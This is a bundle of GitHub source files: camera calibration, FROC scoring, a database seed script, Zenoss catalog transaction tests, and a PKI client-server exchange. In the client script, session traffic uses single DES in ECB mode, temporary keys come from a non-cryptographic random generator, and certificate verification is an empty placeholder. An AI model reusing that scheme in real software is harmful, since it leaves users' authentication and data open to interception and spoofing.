focal length error = {err_f}')\r\n print(f'The principal point error = {err_p}')\r\n print(f'The intrinsic parameters error = {err_ip}')\r\n \r\n def cal_accuracy_by_gt(self, gt_path=r'', mtx=None):\r\n\r\n gt_list = glob.glob(os.path.join(gt_path,'*.npy'))\r\n gt_temp = np.load(gt_list[0],allow_pickle=True)\r\n gt_temp = gt_temp.item()\r\n\r\n K_gt = gt_temp['K']\r\n fx_gt = K_gt[0,0]\r\n fy_gt = K_gt[1,1]\r\n px_gt = K_gt[0,2]\r\n py_gt = K_gt[1,2]\r\n\r\n fx_pred = mtx[0,0]\r\n fy_pred = mtx[1,1]\r\n px_pred = mtx[0,2]\r\n py_pred = mtx[1,2]\r\n\r\n err_f = (abs(fx_pred-fx_gt)+abs(fy_pred-fy_gt))/2\r\n err_p = (abs(px_pred-px_gt)+abs(py_pred-py_gt))/2\r\n err_ip = (err_f+err_p)/2\r\n\r\n\r\n return err_f, err_p, err_ip\r\n\r\n def post_process(self, mtxs):\r\n \"\"\"rescale intrinsics from the solver grid back to the original image size\r\n \"\"\"\r\n mtxs_fix = []\r\n for mtx in mtxs:\r\n fx = mtx[0,0]\r\n fy = mtx[1,1]\r\n px = mtx[0,2]\r\n py = mtx[1,2]\r\n\r\n fx *= self.x_ratio\r\n px *= self.x_ratio\r\n fy *= self.y_ratio\r\n py *= self.y_ratio\r\n\r\n mtx_fix = [ [fx, 0, px], \r\n [0 ,fy, py], \r\n [0, 0, 1]]\r\n\r\n mtxs_fix.append(mtx_fix)\r\n\r\n return mtxs_fix \r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\n test = Calib(img_size=[480,480], log_name='test')\n root_path = r''\n heatmap_folder = r''\n ref_path = r''\n img_folder = r'D:\\DeepCalib\\CCS\\Datasets\\demo_iter_1\\img'\n mtxs = 
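calib_RANSAC_OpenCV above is an instance of the classic RANSAC loop (sample, fit, count inliers, keep the best model); a generic, self-contained sketch of that pattern with hypothetical fit/error callables:

import random

def ransac(samples, fit, error, threshold, iters=100, sample_size=3):
    # Repeatedly fit on a random subset and keep the model with the most inliers.
    best_model, best_inliers = None, 0
    for _ in range(iters):
        subset = random.sample(samples, min(sample_size, len(samples)))
        model = fit(subset)
        inliers = sum(1 for s in samples if error(model, s) < threshold)
        if inliers > best_inliers:
            best_model, best_inliers = model, inliers
    return best_model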
test.calib_RANSAC_OpenCV(img_folder)\n mtxs = test.post_process(mtxs)\n print(mtxs)\n \n","repo_name":"Easonyesheng/CCS","sub_path":"calibration.py","file_name":"calibration.py","file_ext":"py","file_size_in_byte":16575,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"61"}
+{"seq_id":"238712259","text":"#!/usr/bin/env python\r\nimport numpy as np\r\nfrom scipy import interpolate\r\nfrom matplotlib import pyplot as plt\r\n\r\npredefined_fp = [1/4, 1/2, 1, 2, 4, 8]\r\n\r\ndef froc(\r\n tp_prob: np.ndarray,\r\n fp_prob: np.ndarray,\r\n \r\n gt_count: int,\r\n image_count: int,\r\n \r\n predefined_fp: np.ndarray\r\n ):\r\n \"\"\"\r\n Free-response ROC (FROC)\r\n \r\n Args:\r\n tp_prob: np.ndarray, probabilities of the true-positive detections\r\n fp_prob: np.ndarray, probabilities of the false-positive detections\r\n gt_count: int, number of ground-truth bounding boxes\r\n image_count: int, number of image samples\r\n predefined_fp: np.ndarray, predefined FP/image operating points\r\n \r\n Returns:\r\n score: float \r\n \"\"\"\r\n assert gt_count >= len(tp_prob), \"There cannot be more true-positive guesses than ground-truth boxes.\"\r\n \r\n join_probs = np.unique(np.concatenate((tp_prob, fp_prob))) # consider rounding to make this operation faster.\r\n join_probs = np.around(join_probs, decimals=8)\r\n \r\n if len(join_probs) == 0:\r\n return 0 # no score when nothing was predicted\r\n if gt_count == 0:\r\n assert image_count == 0, 'Ground truth count is 0 but image count is not.'\r\n return 0\r\n \r\n # accumulate the counts; there is a faster single-pass algorithm, but this is kept simple.\r\n tp_count = np.zeros(len(join_probs))\r\n fp_count = np.zeros(len(join_probs))\r\n \r\n for idx, join_prob in enumerate(join_probs):\r\n tp_count[idx] = np.count_nonzero(tp_prob >= join_prob)\r\n fp_count[idx] = np.count_nonzero(fp_prob >= join_prob)\r\n tp_rate = tp_count / gt_count\r\n fp_per_img = fp_count / image_count\r\n tp_rate = np.append(tp_rate, 0)[::-1]\r\n fp_per_img = np.append(fp_per_img,0)[::-1]\r\n \r\n predefined_fp = np.sort(predefined_fp)\r\n interpolation_function = interpolate.interp1d(fp_per_img, tp_rate, fill_value=(0, max(tp_rate)), bounds_error=False)\r\n \r\n xnew = np.arange(0, 10, 0.01)\r\n ynew = interpolation_function(xnew) # use interpolation function returned by `interp1d`\r\n plt.plot(xnew, ynew, '-')\r\n \r\n axes = plt.gca()\r\n axes.set_xlim([0, 10])\r\n \r\n plt.legend(['NSCLC', 'SCLC', 'SCC', 'AC'])\r\n plt.xlabel('False Positive per Image')\r\n plt.ylabel('Recall')\r\n \r\n plt.savefig('./froc.png')\r\n \r\n return sum(\r\n interpolation_function(predefined_fp)\r\n ) / len(predefined_fp) # the average recall over the predefined operating points\r\n\r\n \r\n \r\n","repo_name":"Wsine/mindspore2021","sub_path":"evaluate/froc.py","file_name":"froc.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"33216256029","text":"\"\"\" Script to seed database. 
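A quick sketch of calling the `froc` routine above on toy detection scores (all values made up):

import numpy as np

tp = np.array([0.95, 0.80, 0.60])  # confidences of true-positive detections
fp = np.array([0.70, 0.40])        # confidences of false-positive detections
score = froc(tp, fp, gt_count=4, image_count=2, predefined_fp=[0.5, 1, 2, 4])
print(score)  # average recall at the predefined FP/image operating points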
\"\"\"\n\nimport os\nimport json\nfrom random import choice, randint\n\nimport crud\nimport model\nimport server\n\nos.system('dropdb affirmations_db')\nos.system('createdb affirmations_db')\n\nmodel.connect_to_db(server.app)\nmodel.db.create_all()\n\nwith open('data/messages.json') as f:\n message_data = json.load(f)\n\nmessages_in_db = []\nfor message in message_data:\n message_author = message['Author']\n message_text = message['Text']\n\n db_message = crud.create_message(message_author, message_text)\n \n messages_in_db.append(db_message)\n\n\nfname = model.User.fname\nphone_num = model.User.phone_num\nuser = crud.create_user(fname, phone_num)\n\n# for message in sent messages:\n # if user has received that message:\n # create instance of user_message\n# user_message = crud.create_user_message(user, db_message)","repo_name":"ainethompson/affirmations","sub_path":"seed_database.py","file_name":"seed_database.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12566775123","text":"import socket\r\nfrom Crypto.Cipher import DES, AES, PKCS1_OAEP\r\nfrom Crypto.PublicKey import RSA\r\nfrom Crypto.Signature import pkcs1_15\r\nfrom Crypto.Hash import SHA256\r\nfrom Crypto.Util.Padding import pad, unpad\r\nimport hashlib\r\nimport hmac\r\nimport time\r\nfrom Crypto.Random import get_random_bytes\r\nimport string\r\nimport random\r\n\r\nHOST = '127.0.0.1' # IP address for server socket\r\nPORT = 65432 # port for server socket\r\nnetworkAddress = HOST + PORT.__str__()\r\nBLOCK_SIZE = 32\r\nclient1_id = 'ID-Client1'\r\napplicationServer_id = 'ID-Server'\r\ncentralizedCertificateAuthority_id = 'ID-CA'\r\nreq = 'memo'\r\nsessionLifetime = 86400\r\n\r\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as applicationServer:\r\n applicationServer.connect((HOST, PORT))\r\n print('\\nClient is running...')\r\n print('\\nConnected to application server using IP address \"{}\" - port \"{}\"...'.format(HOST, PORT))\r\n\r\n # Client Registration; construction and sending of message content (3)\r\n # (Client -> Application Server)\r\n # Constructed message contents:\r\n # [Application Server ID||Timestamp3]\r\n timestamp3 = time.time().__trunc__()\r\n message3 = applicationServer_id + timestamp3.__str__()\r\n encodedMessage3 = message3.encode(\"utf-8\")\r\n applicationServer.sendall(encodedMessage3)\r\n\r\n # Client Registration; reception and parsing of message content (4)\r\n # (Application Server -> Client)\r\n # Expected message contents:\r\n # [Application Server Public-Key||Certificate||Timestamp4]\r\n receivedData4 = applicationServer.recv(4096)\r\n receivedDataDecoded4 = receivedData4.decode(\"utf-8\")\r\n receivedTimestamp4 = receivedDataDecoded4[-10:]\r\n upperBoundApplicationServerPublicKey = receivedDataDecoded4.rindex(\"END PUBLIC KEY-----\") + 17\r\n lowerBoundApplicationServerPublicKey = receivedDataDecoded4.find(\"-----BEGIN PUBLIC KEY\")\r\n receivedApplicationServerPublicKey = \\\r\n receivedDataDecoded4[lowerBoundApplicationServerPublicKey:upperBoundApplicationServerPublicKey]\r\n print('\\nReceived plaintext from application server: \"{}\" (Step 4)'.format(receivedDataDecoded4))\r\n certificate = receivedDataDecoded4.replace(receivedTimestamp4, '').replace(receivedApplicationServerPublicKey, '')\r\n\r\n # Verification of received application server public-key and certificate\r\n\r\n # Client Registration; second construction and sending of message content (5)\r\n # (Client -> 
Application Server)\r\n # Constructed message contents:\r\n # [Temporary Key2||Client ID||Client IP Address||Client Port||Timestamp5]\r\n letters = string.ascii_lowercase\r\n client_tk = (''.join(random.choice(letters) for i in range(8)))\r\n print('\\nSecond temporary-key generated: \"{}\" (Step 5)'.format(client_tk))\r\n timestamp5 = time.time().__trunc__()\r\n message5 = client_tk + client1_id + HOST + PORT.__str__() + timestamp5.__str__()\r\n encodedMessage5 = message5.encode(\"utf-8\")\r\n\r\n # Application server public-key importation\r\n file_in = open('CCA_applicationServer_publicKey.pem', 'r')\r\n applicationServer_publicKey = RSA.import_key(file_in.read())\r\n\r\n RSA_cipher5 = PKCS1_OAEP.new(applicationServer_publicKey)\r\n encryptedMessageEncoded5 = RSA_cipher5.encrypt(encodedMessage5)\r\n applicationServer.sendall(encryptedMessageEncoded5)\r\n print('\\nSent ciphertext to application server: \"{}\" (Step 5)'.format(encryptedMessageEncoded5))\r\n\r\n # Client Registration; second reception and parsing of message content (6)\r\n # (Application Server -> Client)\r\n # Expected message contents:\r\n # [Session Key||Session Lifetime||Client ID||Timestamp6]\r\n receivedData6 = applicationServer.recv(4096)\r\n print('\\nReceived ciphertext from application server: \"{}\" (Step 6)'.format(receivedData6))\r\n des_cipher6 = DES.new(client_tk.encode(\"utf-8\"), DES.MODE_ECB)\r\n receivedDataDecrypted6 = des_cipher6.decrypt(receivedData6)\r\n unpaddedReceivedDataDecrypted6 = unpad(receivedDataDecrypted6, BLOCK_SIZE)\r\n receivedDataDecryptedDecoded6 = unpaddedReceivedDataDecrypted6.decode(\"utf-8\")\r\n upperBoundSessionKeyExtract6 = receivedDataDecryptedDecoded6.find('86400')\r\n extractedSessionKey6 = receivedDataDecryptedDecoded6[0:upperBoundSessionKeyExtract6]\r\n print('\\nReceived session key from application server: \"{}\" (Step 6)'.format(extractedSessionKey6))\r\n\r\n # Service Request; construction and transmission of message content (7)\r\n # (Client -> Application Server)\r\n # Constructed message contents:\r\n # [req||Timestamp7]\r\n des_cipher7 = DES.new(extractedSessionKey6.encode(\"utf-8\"), DES.MODE_ECB)\r\n timestamp7 = time.time().__trunc__()\r\n message7 = req + timestamp7.__str__()\r\n encodedMessage7 = message7.encode(\"utf-8\")\r\n encodedMessage7Encrypted = des_cipher7.encrypt(pad(encodedMessage7, BLOCK_SIZE))\r\n applicationServer.sendall(encodedMessage7Encrypted)\r\n\r\n # Service Request; reception and parsing of message content (8)\r\n # (Application Server -> Client)\r\n # Expected message contents:\r\n # [data||Timestamp8]\r\n receivedData8 = applicationServer.recv(4096)\r\n print('\\nReceived ciphertext from application server: \"{}\" (Step 8)'.format(receivedData8))\r\n des_cipher8 = DES.new(extractedSessionKey6.encode(\"utf-8\"), DES.MODE_ECB)\r\n receivedData8Decrypted = des_cipher8.decrypt(receivedData8)\r\n unpaddedReceivedData8Decrypted = unpad(receivedData8Decrypted, BLOCK_SIZE)\r\n receivedData8DecryptedDecoded = unpaddedReceivedData8Decrypted.decode(\"utf-8\")\r\n extractedTimestamp8 = receivedData8DecryptedDecoded[-10:]\r\n data = receivedData8DecryptedDecoded.replace(extractedTimestamp8, '')\r\n print('\\nReceived message from client: \"{}\" (Step 
8)'.format(req))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"westbenj2020/PKI-Based-Authentication","sub_path":"client1.py","file_name":"client1.py","file_ext":"py","file_size_in_byte":5737,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"17623854073","text":"import transaction\nimport unittest\n\nfrom Products.AdvancedQuery import Eq, MatchGlob, In\nfrom Products.ZenTestCase.BaseTestCase import BaseTestCase\nfrom Products.Zuul.catalog.interfaces import IModelCatalogTool\nfrom Products.Zuul.catalog.model_catalog import ModelCatalogDataManager, SearchParams, \\\n TX_SEPARATOR, TX_STATE_FIELD, MANDATORY_FIELDS\nfrom Products.Zuul.catalog.indexable import MODEL_INDEX_UID_FIELD as SOLR_UID\nfrom Products.Zuul.catalog.indexable import OBJECT_UID_FIELD as UID\n\nfrom Products.ZenModel.Device import manage_createDevice\n\nfrom zenoss.modelindex.model_index import SearchParams\n\n\nclass TestModelCatalogTransactions(BaseTestCase):\n\n def afterSetUp(self):\n super(TestModelCatalogTransactions, self).afterSetUp()\n # Lets change the ModelCatalogTestDataManager with ModelCatalogDataManager\n self.model_catalog = IModelCatalogTool(self.dmd)\n self.data_manager = ModelCatalogDataManager('localhost:8983', self.dmd)\n self.model_catalog.model_catalog_client._data_manager = self.data_manager\n # get a reference to model_index to be able to fo checks bypassing the data manager\n self.model_index = self.data_manager.model_index\n\n def beforeTearDown(self):\n # we dont need to put back the test data manager since each test creates its own\n pass\n\n def _get_transaction_state(self):\n tid = self.data_manager._get_tid()\n return self.data_manager._current_transactions.get(tid)\n\n def _check_tx_state(self, pending=None, temp_indexed=None, temp_deleted=None):\n tx_state = self._get_transaction_state()\n\n if pending and isinstance(pending, basestring):\n pending = [ pending ]\n if temp_indexed and isinstance(temp_indexed, basestring):\n temp_indexed = [ temp_indexed ]\n if temp_deleted and isinstance(temp_deleted, basestring):\n temp_deleted = [ temp_deleted ]\n\n if pending:\n for uid in pending:\n self.assertTrue(uid in tx_state.pending_updates)\n if temp_indexed:\n for uid in temp_indexed:\n self.assertTrue(uid in tx_state.temp_indexed_uids)\n self.assertFalse(uid in tx_state.temp_deleted_uids)\n if temp_deleted:\n for uid in temp_deleted:\n self.assertTrue(uid in tx_state.temp_deleted_uids)\n self.assertFalse(uid in tx_state.temp_indexed_uids)\n\n def _validate_temp_indexed_results(self, results, expected_object_uids):\n found_object_uids = set()\n for result in results:\n solr_uid = getattr(result, SOLR_UID)\n uid = getattr(result, UID)\n found_object_uids.add(uid)\n self.assertNotEquals(uid, solr_uid)\n self.assertTrue(uid in solr_uid)\n self.assertTrue(TX_SEPARATOR in solr_uid)\n self.assertIsNotNone(getattr(result, TX_STATE_FIELD))\n self.assertTrue(getattr(result, TX_STATE_FIELD) != 0)\n self.assertEquals(set(found_object_uids), set(expected_object_uids))\n\n def _simulate_tx_commit(self):\n tx = transaction.get()\n self.data_manager.tpc_begin(tx)\n self.data_manager.tpc_finish(tx)\n\n def testPartialUpdates(self):\n # for this test we need to create a test device and commit the changes to\n device = manage_createDevice(self.dmd, 'my_device', '/')\n ip = \"10.10.10.1\"\n prod_state = 500\n device_uid = device.idx_uid()\n device.setManageIp(ip)\n device.setProdState(prod_state)\n\n # get the uids we are about to 
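The client above wraps its session traffic in DES-ECB with PKCS#7 padding; a minimal round-trip sketch of that primitive using the same pycryptodome calls (key and message are made up; DES keys must be exactly 8 bytes):

from Crypto.Cipher import DES
from Crypto.Util.Padding import pad, unpad

key = b'8bytekey'
ct = DES.new(key, DES.MODE_ECB).encrypt(pad(b'memo', 32))  # 32 = BLOCK_SIZE in the script
pt = unpad(DES.new(key, DES.MODE_ECB).decrypt(ct), 32)
assert pt == b'memo'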
commit so we can revert them at the end\n tx_state = self._get_transaction_state()\n tid = tx_state.tid\n updated_uids = set(tx_state.pending_updates.keys()) | tx_state.temp_indexed_uids\n try:\n # simulate the transaction was committed and do a few partial updates\n self._simulate_tx_commit()\n # make sure the device was correctly indexed\n fields = [\"productionState\", \"text_ipAddress\"]\n search_results = self.model_catalog.search(query=Eq(UID, device_uid), fields=fields, commit_dirty=False)\n self.assertEquals(search_results.total, 1)\n brain = search_results.results.next()\n self.assertEquals(brain.uid, device_uid)\n self.assertEquals(brain.text_ipAddress, ip)\n self.assertEquals(brain.productionState, prod_state)\n\n # update prod state triggers an atomic update\n new_prod_state = 1000\n device.setProdState(new_prod_state)\n # tx_state.pending_updates.values()[0].spec.to_dict()\n # mi_results = self.model_index.search(SearchParams(Eq(UID, device_uid)))\n # repeat the search and make sure that the atomic update has all the fields it should\n search_results = self.model_catalog.search(query=Eq(UID, device_uid), fields=fields, commit_dirty=True)\n self.assertEquals(search_results.total, 1)\n brain = search_results.results.next()\n self.assertEquals(brain.uid, device_uid)\n self.assertEquals(brain.text_ipAddress, ip)\n self.assertEquals(brain.productionState, new_prod_state)\n # Make sure the index update is correct\n tx_state = self._get_transaction_state()\n index_update = tx_state.indexed_updates.get(device_uid)\n self.assertIsNotNone(index_update)\n expected_fields = MANDATORY_FIELDS | set( [ \"productionState\" ] )\n self.assertEquals(expected_fields, index_update.idxs)\n\n # Set manage ip also sends a partial update for fields \n # 'decimal_ipAddress', 'text_ipAddress'\n new_ip = \"10.10.10.2\"\n device.setManageIp(new_ip)\n search_results = self.model_catalog.search(query=Eq(UID, device_uid), fields=fields, commit_dirty=True)\n self.assertEquals(search_results.total, 1)\n brain = search_results.results.next()\n self.assertEquals(brain.uid, device_uid)\n self.assertEquals(brain.text_ipAddress, new_ip)\n self.assertEquals(brain.productionState, new_prod_state)\n # Make sure the partial updates have been correctly combined\n tx_state = self._get_transaction_state()\n index_update = tx_state.indexed_updates.get(device_uid)\n self.assertIsNotNone(index_update)\n expected_fields = MANDATORY_FIELDS | set([ 'decimal_ipAddress', 'text_ipAddress', \"productionState\" ])\n self.assertEquals(expected_fields, index_update.idxs)\n\n # simulate another transaction commit and check everything went well\n self._simulate_tx_commit()\n search_results = self.model_catalog.search(query=Eq(UID, device_uid), fields=fields, commit_dirty=False)\n self.assertEquals(search_results.total, 1)\n brain = search_results.results.next()\n self.assertEquals(brain.uid, device_uid)\n self.assertEquals(brain.text_ipAddress, new_ip)\n self.assertEquals(brain.productionState, new_prod_state)\n\n # make sure all temp documents have beed deleted\n search_results = self.model_catalog.search(query=Eq(TX_STATE_FIELD, tid), commit_dirty=False)\n self.assertEquals(search_results.total, 0)\n finally:\n query = In(UID, updated_uids)\n self.model_index.unindex_search(SearchParams(query))\n\n\n def testMultipleUpdates(self):\n device = manage_createDevice(self.dmd, 'my_device', '/')\n device_uid = device.idx_uid()\n # On creationg, a index update of the whole object should have been created\n tx_state = 
self._get_transaction_state()\n self._check_tx_state(pending=device_uid)\n # temporarily commit changes made so far\n self.data_manager.do_mid_transaction_commit()\n # We should be able to find the newly created device\n search_results = self.model_catalog.search(query=Eq(UID, device_uid), commit_dirty=False)\n self._validate_temp_indexed_results(search_results, expected_object_uids=[device_uid])\n # Changing the managed ip should trigger another index update\n ip = \"10.10.10.1\"\n device.setManageIp(ip)\n self.assertTrue(device_uid in tx_state.pending_updates)\n self.assertTrue(device_uid in tx_state.temp_indexed_uids)\n\n # a search by ip \"10.10.10.1\" should return our device\n search_results = self.model_catalog.search(query=Eq(\"text_ipAddress\", ip), commit_dirty=True)\n self._validate_temp_indexed_results(search_results, expected_object_uids=[device_uid])\n\n # set the managed ip to a different value\n old_ip = ip\n new_ip = \"10.10.10.2\"\n device.setManageIp(new_ip)\n # search by new ip should return our device\n search_results = self.model_catalog.search(query=Eq(\"text_ipAddress\", new_ip), commit_dirty=True)\n self._validate_temp_indexed_results(search_results, expected_object_uids=[device_uid])\n # search by old ip should NOT return anything\n search_results = self.model_catalog.search(query=Eq(\"text_ipAddress\", old_ip), commit_dirty=True)\n self._validate_temp_indexed_results(search_results, expected_object_uids=[])\n\n # set production state\n prod_state = 1100\n device.setProdState(prod_state)\n search_results = self.model_catalog.search(query=Eq(\"productionState\", prod_state), commit_dirty=True)\n self._validate_temp_indexed_results(search_results, expected_object_uids=[device_uid])\n\n # Search by uid and check all the fields are correct\n fields = [\"productionState\", \"text_ipAddress\"]\n search_results = self.model_catalog.search(query=Eq(UID, device_uid), fields=fields, commit_dirty=False)\n self.assertEquals(search_results.total, 1)\n brain = search_results.results.next()\n self.assertEquals(brain.uid, device_uid)\n self.assertEquals(brain.text_ipAddress, new_ip)\n self.assertEquals(brain.productionState, prod_state)\n\n def testDataManager(self):\n # before any changes are made, tx_state is None\n self.assertIsNone(self._get_transaction_state())\n device_class_1 = \"device_class_1\"\n device_class_2 = \"device_class_2\"\n device_class_3 = \"device_class_3\"\n device_class_4 = \"device_class_4\"\n\n # create an organizer\n dc_1 = self.dmd.Devices.createOrganizer(device_class_1)\n tx_state = self._get_transaction_state()\n dc_1_uid = dc_1.idx_uid()\n\n # Some tx_state checks\n self.assertIsNotNone(tx_state)\n self.assertTrue( len(tx_state.pending_updates) > 0 )\n self.assertTrue( len(tx_state.indexed_updates) == 0 )\n self.assertTrue( len(tx_state.temp_indexed_uids) == 0 )\n self.assertTrue( len(tx_state.temp_deleted_uids) == 0 )\n\n # The new organizer index update should have been buffered in tx_state\n self._check_tx_state(pending=dc_1_uid)\n\n # A search with commit_dirty=False should not find the new device organizer\n search_results = self.model_catalog.search(query=Eq(UID, dc_1_uid), commit_dirty=False)\n self.assertEquals( search_results.total, 0 )\n\n # A search with commit_dirty=True must find the new device organizer\n search_results = self.model_catalog.search(query=Eq(UID, dc_1_uid), commit_dirty=True)\n # model catalog should return the dirty doc\n self.assertEquals( search_results.total, 1 )\n self._validate_temp_indexed_results(search_results, 
expected_object_uids=[dc_1_uid])\n\n # the tx_state object should have been updated appropriately\n self._check_tx_state(temp_indexed=dc_1_uid)\n self.assertTrue( len(tx_state.pending_updates) == 0 )\n \n # create another organizer\n dc_2 = self.dmd.Devices.createOrganizer(device_class_2)\n dc_2_uid = dc_2.idx_uid()\n\n # check tx_state has been updated accordingly\n self._check_tx_state(pending=dc_2_uid, temp_indexed=dc_1_uid)\n\n # search for both device classes with commit_dirty=False, it should only return dc_1_uid\n query = MatchGlob(UID, \"/zport/dmd/Devices/device_class*\")\n search_results = self.model_catalog.search(query=query, commit_dirty=False)\n self._validate_temp_indexed_results(search_results, expected_object_uids=[dc_1_uid])\n # tx_state should not have changed\n self._check_tx_state(pending=dc_2_uid, temp_indexed=dc_1_uid)\n\n # now with commit_dirty=True\n search_results = self.model_catalog.search(query=query, commit_dirty=True)\n self._check_tx_state(temp_indexed=[dc_1_uid, dc_2_uid])\n # it should return 2 device classes\n self.assertEquals( search_results.total, 2 )\n self._validate_temp_indexed_results(search_results, expected_object_uids=[dc_1_uid, dc_2_uid])\n\n # Let's delete device_class_1\n self.dmd.Devices._delObject(device_class_1)\n self._check_tx_state(pending=[dc_1_uid])\n # a search with commit_dirty=True should not return device_class_1 anymore\n search_results = self.model_catalog.search(query=query, commit_dirty=True)\n self._validate_temp_indexed_results(search_results, expected_object_uids=[dc_2_uid])\n self._check_tx_state(temp_deleted=[dc_1_uid])\n # however, we should have two temp docs matching \"/zport/dmd/Devices/device_class*\"\n mi_results = self.model_index.search(SearchParams(query))\n self.assertTrue( mi_results.total_count == 2 )\n # make sure a count type of query works (search with limit=0)\n search_results = self.model_catalog.search(query=query, limit=0, commit_dirty=True)\n self.assertTrue( search_results.total == 1 )\n\n # some more tx_state checks before moving on to the next thing\n tx_state = self._get_transaction_state()\n self.assertTrue( len(tx_state.pending_updates) == 0 )\n self.assertTrue( len(tx_state.indexed_updates) == 2 )\n self.assertTrue( len(tx_state.temp_indexed_uids) == 1 )\n self.assertTrue( len(tx_state.temp_deleted_uids) == 1 )\n\n # Simulate transaction is committed and do checks\n updated_uids = set(tx_state.pending_updates.keys()) | tx_state.temp_indexed_uids\n try:\n tid = self.data_manager._get_tid()\n # before commit we should have 2 docs with tx_state = tid\n mi_results = self.model_index.search(SearchParams( Eq(TX_STATE_FIELD, tid) ))\n self.assertTrue( mi_results.total_count == 2 )\n # Let's do the commit\n self._simulate_tx_commit()\n self.assertIsNone(self._get_transaction_state())\n # Check we only have one doc matching \"/zport/dmd/Devices/device_class*\"\n search_results = self.model_catalog.search(query=query, commit_dirty=False)\n self.assertEquals( search_results.total, 1 )\n # Check the result's tx_state field has been set to zero\n brain = search_results.results.next()\n self.assertEquals( brain.tx_state, 0 )\n # No documents should remain with tx_state == tid\n mi_results = self.model_index.search(SearchParams( Eq(TX_STATE_FIELD, tid) ))\n self.assertEquals( mi_results.total_count, 0 )\n finally:\n # clean up created docs in solr\n query = In(UID, updated_uids)\n self.model_index.unindex_search(SearchParams(query))\n\n # create another organizer in a new transaction\n
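# exercise abort(): temp docs flushed to solr by a mid-transaction commit must\n # be cleaned up when the transaction is rolled back\n dc_3 = 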
self.dmd.Devices.createOrganizer(device_class_3)\n dc_3_uid = dc_3.idx_uid()\n self._check_tx_state(pending=dc_3_uid)\n tx_state = self._get_transaction_state()\n self.assertTrue( len(tx_state.pending_updates) == 1 )\n self.assertTrue( len(tx_state.indexed_updates) == 0 )\n self.assertTrue( len(tx_state.temp_indexed_uids) == 0 )\n self.assertTrue( len(tx_state.temp_deleted_uids) == 0 )\n # Manual mid-transaction commit\n self.data_manager.do_mid_transaction_commit()\n self._check_tx_state(temp_indexed=dc_3_uid)\n self.assertTrue( len(tx_state.pending_updates) == 0 )\n self.assertTrue( len(tx_state.indexed_updates) == 1 )\n self.assertTrue( len(tx_state.temp_indexed_uids) == 1 )\n self.assertTrue( len(tx_state.temp_deleted_uids) == 0 )\n query = MatchGlob(UID, \"/zport/dmd/Devices/device_class*\")\n search_results = self.model_catalog.search(query=query, commit_dirty=False)\n self._validate_temp_indexed_results(search_results, expected_object_uids=[dc_3_uid])\n # Simulate transaction is aborted and check tx state has been reset\n self.data_manager.abort(transaction.get())\n # No docs should match the device class uid\n search_results = self.model_catalog.search(query=Eq(UID, dc_3_uid), commit_dirty=False)\n self.assertTrue(search_results.total == 0)\n # No documents should remain with tx_state == tid\n tid = self.data_manager._get_tid()\n mi_results = self.model_index.search(SearchParams( Eq(TX_STATE_FIELD, tid) ))\n self.assertEquals( mi_results.total_count, 0 )\n self.assertIsNone(self._get_transaction_state())\n\n # delete a doc that exists before current tx, do a search with commit dirty and abort\n dc_4 = self.dmd.Devices.createOrganizer(device_class_4)\n dc_4_uid = dc_4.idx_uid()\n query = Eq(UID, dc_4_uid)\n try:\n self._simulate_tx_commit() # commit to get the device_class_4 doc in solr\n # check the doc exists in solr\n search_results = self.model_catalog.search(query=query)\n self.assertTrue(search_results.total == 1)\n # delete the object\n self.dmd.Devices._delObject(device_class_4)\n # a model catalog search with commit_dirty=True should not return the deleted doc\n search_results = self.model_catalog.search(query=query, commit_dirty=True)\n self.assertTrue(search_results.total == 0)\n # however the doc is still in solr\n mi_results = self.model_index.search(SearchParams(query))\n self.assertTrue( mi_results.total_count == 1 )\n # Abort tx\n self.data_manager.abort(transaction.get())\n # The doc should have been left intact in solr\n search_results = self.model_catalog.search(query=query)\n self.assertTrue(search_results.total == 1)\n finally:\n # clean up created docs in solr\n self.model_index.unindex_search(SearchParams(query))\n\n def testSearchBrain(self):\n # create an object\n device_class_1 = \"device_class_1\"\n dc_1 = self.dmd.Devices.createOrganizer(device_class_1)\n dc_1_uid = dc_1.idx_uid()\n search_results = self.data_manager.search_brain(uid=dc_1_uid, context=self.dmd, commit_dirty=False)\n self.assertTrue( search_results.total == 0 )\n search_results = self.data_manager.search_brain(uid=dc_1_uid, context=self.dmd, commit_dirty=True)\n self.assertTrue( search_results.total == 1 )\n self._validate_temp_indexed_results(search_results, expected_object_uids=[dc_1_uid])\n\n def testSearches(self):\n n_organizers = 100\n organizers = {}\n pattern = \"testSearches_DEVICE_CLASS_\"\n for i in xrange(n_organizers):\n dc = self.dmd.Devices.createOrganizer(\"{}{:02}\".format(pattern, i))\n organizers[dc.idx_uid()] = dc\n query = MatchGlob(UID, 
\"/zport/dmd/Devices/{}*\".format(pattern))\n search_results = self.model_catalog.search(query=query, commit_dirty=False)\n self.assertTrue( search_results.total == 0 )\n search_results = self.model_catalog.search(query=query, commit_dirty=True)\n self.assertTrue( search_results.total == n_organizers )\n search_results = self.model_catalog.search(query=query, limit=0)\n self.assertTrue( search_results.total == n_organizers )\n limit = 18\n for start in [ 0, 12, 45, 70 ]:\n expected_uids = { \"/zport/dmd/Devices/{}{:02}\".format(pattern, i) for i in xrange(start, start+limit) }\n search_results = self.model_catalog.search(query=query, start=start, limit=limit)\n self.assertTrue( search_results.total == n_organizers )\n brain_uids = { getattr(brain, UID) for brain in search_results.results }\n self.assertEquals( len(brain_uids), limit )\n self.assertEquals( len(brain_uids), len(expected_uids) )\n self.assertTrue( len( expected_uids - brain_uids ) == 0 )\n self.assertTrue( len( brain_uids - expected_uids ) == 0 )\n\n\ndef test_suite():\n return unittest.TestSuite((unittest.makeSuite(TestModelCatalogTransactions),))\n\n\nif __name__==\"__main__\":\n unittest.main(defaultTest='test_suite')\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/Zuul/catalog/tests/testModelCatalogTransactions.py","file_name":"testModelCatalogTransactions.py","file_ext":"py","file_size_in_byte":20995,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"31542589268","text":"import pandas as pd\nimport evaluate\n\ndef bleu():\n 